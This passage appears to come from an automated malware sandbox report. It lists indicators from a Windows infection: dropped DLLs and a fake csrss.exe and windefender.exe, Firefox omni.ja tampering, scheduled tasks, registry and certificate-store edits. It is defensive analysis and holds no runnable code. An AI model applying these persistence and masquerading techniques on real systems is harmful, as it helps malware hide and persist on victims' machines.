| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\EXgRWGG.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\ArGlQVg.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\yvWovCiVU\TRDYCX.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\mVqQIGUXDOgrC\QWFyiZq.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\mVqQIGUXDOgrC\uLcyUgC.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\yvWovCiVU\ABWjUqu.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\LCifMpYymZWU2\HTMRMDKYbCyXN.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\LCifMpYymZWU2\kWMHQKZ.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\gbPxNkbXHfUn\lsTuwPS.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe | N/A |
| File created | C:\Windows\Tasks\mRaseIvrfxDtBOYKW.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\FTXCzbcEvROqagNdd.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\eGwAoTnpAObQfPU.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe | N/A |
| File created | C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\u2dw.0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\u2dw.0.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS882B.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS882B.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zSC340.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zSC340.tmp\Install.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-571 = "China Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2342 = "Haiti Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-3142 = "South Sudan Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c